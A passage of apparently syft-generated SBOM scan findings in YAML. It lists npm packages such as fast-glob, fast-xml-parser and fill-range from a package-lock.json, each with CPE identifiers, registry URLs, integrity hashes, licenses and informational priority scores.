- cpe: cpe:2.3:a:fast_deep_equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_deep_equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast:fast-deep-equal:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast:fast_deep_equal:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fast-deep-equal@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-2.0.1.tgz
|
|
integrity: sha512-bCK/2Z4zLidyB4ReuIsvALH6w31YfAQDmXMqMx6FyfHqvBxtjC0eRumeSu4Bs3XtXwpyIywtSTrVT99BxY1f9w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: df8671df2c12ad48
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fast-deep-equal 3.1.3'
|
|
title: fast-deep-equal 3.1.3
|
|
description: 'Package discovered: fast-deep-equal 3.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5dcd27213b9411fd
|
|
name: fast-deep-equal
|
|
version: 3.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fast-deep-equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-deep-equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_deep_equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_deep_equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast:fast-deep-equal:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast:fast_deep_equal:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fast-deep-equal@3.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz
|
|
integrity: sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f137c47d21c65abc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fast-equals 5.4.0'
|
|
title: fast-equals 5.4.0
|
|
description: 'Package discovered: fast-equals 5.4.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fea7469744f21377
|
|
name: fast-equals
|
|
version: 5.4.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fast-equals:fast-equals:5.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-equals:fast_equals:5.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_equals:fast-equals:5.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_equals:fast_equals:5.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast:fast-equals:5.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast:fast_equals:5.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fast-equals@5.4.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fast-equals/-/fast-equals-5.4.0.tgz
|
|
integrity: sha512-jt2DW/aNFNwke7AUd+Z+e6pz39KO5rzdbbFCg2sGafS4mk13MI7Z8O5z9cADNn5lhGODIgLwug6TZO2ctf7kcw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c3d9f6c04405728e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fast-glob 3.3.3'
|
|
title: fast-glob 3.3.3
|
|
description: 'Package discovered: fast-glob 3.3.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 756085ffd4026f3c
|
|
name: fast-glob
|
|
version: 3.3.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fast-glob:fast-glob:3.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-glob:fast_glob:3.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_glob:fast-glob:3.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_glob:fast_glob:3.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast:fast-glob:3.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast:fast_glob:3.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fast-glob@3.3.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.3.tgz
|
|
integrity: sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg==
|
|
dependencies:
|
|
'@nodelib/fs.stat': ^2.0.2
|
|
'@nodelib/fs.walk': ^1.2.3
|
|
glob-parent: ^5.1.2
|
|
merge2: ^1.3.0
|
|
micromatch: ^4.0.8
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c31f574684b9f10b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fast-xml-builder 1.1.5'
|
|
title: fast-xml-builder 1.1.5
|
|
description: 'Package discovered: fast-xml-builder 1.1.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b198a6d2f9894f68
|
|
name: fast-xml-builder
|
|
version: 1.1.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fast-xml-builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-xml-builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_xml_builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_xml_builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast_xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast:fast-xml-builder:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast:fast_xml_builder:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fast-xml-builder@1.1.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.5.tgz
|
|
integrity: sha512-4TJn/8FKLeslLAH3dnohXqE3QSoxkhvaMzepOIZytwJXZO69Bfz0HBdDHzOTOon6G59Zrk6VQ2bEiv1t61rfkA==
|
|
dependencies:
|
|
path-expression-matcher: ^1.1.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b4dd20a63e4dfb25
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fast-xml-parser 5.7.2'
|
|
title: fast-xml-parser 5.7.2
|
|
description: 'Package discovered: fast-xml-parser 5.7.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 03ef00f42507be2f
|
|
name: fast-xml-parser
|
|
version: 5.7.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:naturalintelligence:fast-xml-parser:5.7.2:*:*:*:*:*:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/fast-xml-parser@5.7.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.7.2.tgz
|
|
integrity: sha512-P7oW7tLbYnhOLQk/Gv7cZgzgMPP/XN03K02/Jy6Y/NHzyIAIpxuZIM/YqAkfiXFPxA2CTm7NtCijK9EDu09u2w==
|
|
dependencies:
|
|
'@nodable/entities': ^2.1.0
|
|
fast-xml-builder: ^1.1.5
|
|
path-expression-matcher: ^1.5.0
|
|
strnum: ^2.2.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0cdc7a6cc314eb50
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fastq 1.20.1'
|
|
title: fastq 1.20.1
|
|
description: 'Package discovered: fastq 1.20.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 32597e8bd5ad1e0f
|
|
name: fastq
|
|
version: 1.20.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fastq:fastq:1.20.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fastq@1.20.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fastq/-/fastq-1.20.1.tgz
|
|
integrity: sha512-GGToxJ/w1x32s/D2EKND7kTil4n8OVk/9mycTc4VDza13lOvpUZTGX3mFSCtV9ksdGBVzvsyAVLM6mHFThxXxw==
|
|
dependencies:
|
|
reusify: ^1.0.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 98eadb7c6959fda9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: faye-websocket 0.11.4'
|
|
title: faye-websocket 0.11.4
|
|
description: 'Package discovered: faye-websocket 0.11.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5a9d4671ef023c43
|
|
name: faye-websocket
|
|
version: 0.11.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:faye-websocket:faye-websocket:0.11.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:faye-websocket:faye_websocket:0.11.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:faye_websocket:faye-websocket:0.11.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:faye_websocket:faye_websocket:0.11.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:faye:faye-websocket:0.11.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:faye:faye_websocket:0.11.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/faye-websocket@0.11.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/faye-websocket/-/faye-websocket-0.11.4.tgz
|
|
integrity: sha512-CzbClwlXAuiRQAlUyfqPgvPoNKTckTPGfwZV4ZdAhVcP2lh9KUxJg2b5GkE7XbjKQ3YJnQ9z6D9ntLAlB+tP8g==
|
|
dependencies:
|
|
websocket-driver: '>=0.5.1'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 64d0cebc4ed83cee
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fdir 6.5.0'
|
|
title: fdir 6.5.0
|
|
description: 'Package discovered: fdir 6.5.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4d9064c107e69a4e
|
|
name: fdir
|
|
version: 6.5.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fdir:fdir:6.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fdir@6.5.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz
|
|
integrity: sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7b56dfc5637424f2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fflate 0.8.2'
|
|
title: fflate 0.8.2
|
|
description: 'Package discovered: fflate 0.8.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ad8b63b86fd3ee37
|
|
name: fflate
|
|
version: 0.8.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fflate:fflate:0.8.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fflate@0.8.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fflate/-/fflate-0.8.2.tgz
|
|
integrity: sha512-cPJU47OaAoCbg0pBvzsgpTPhmhqI5eJjh/JIu8tPj5q+T7iLvW/JAYUqmE7KOB4R1ZyEhzBaIQpQpardBF5z8A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d2d1a258c47b4e8a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fill-range 7.1.1'
|
|
title: fill-range 7.1.1
|
|
description: 'Package discovered: fill-range 7.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: adf22420cd3811ab
|
|
name: fill-range
|
|
version: 7.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fill-range:fill-range:7.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fill-range:fill_range:7.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fill_range:fill-range:7.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fill_range:fill_range:7.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fill:fill-range:7.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fill:fill_range:7.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fill-range@7.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz
|
|
integrity: sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==
|
|
dependencies:
|
|
to-regex-range: ^5.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0d132a7f95881c19
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: finalhandler 1.3.2'
|
|
title: finalhandler 1.3.2
|
|
description: 'Package discovered: finalhandler 1.3.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 257d2278606af57b
|
|
name: finalhandler
|
|
version: 1.3.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:finalhandler:finalhandler:1.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/finalhandler@1.3.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.2.tgz
|
|
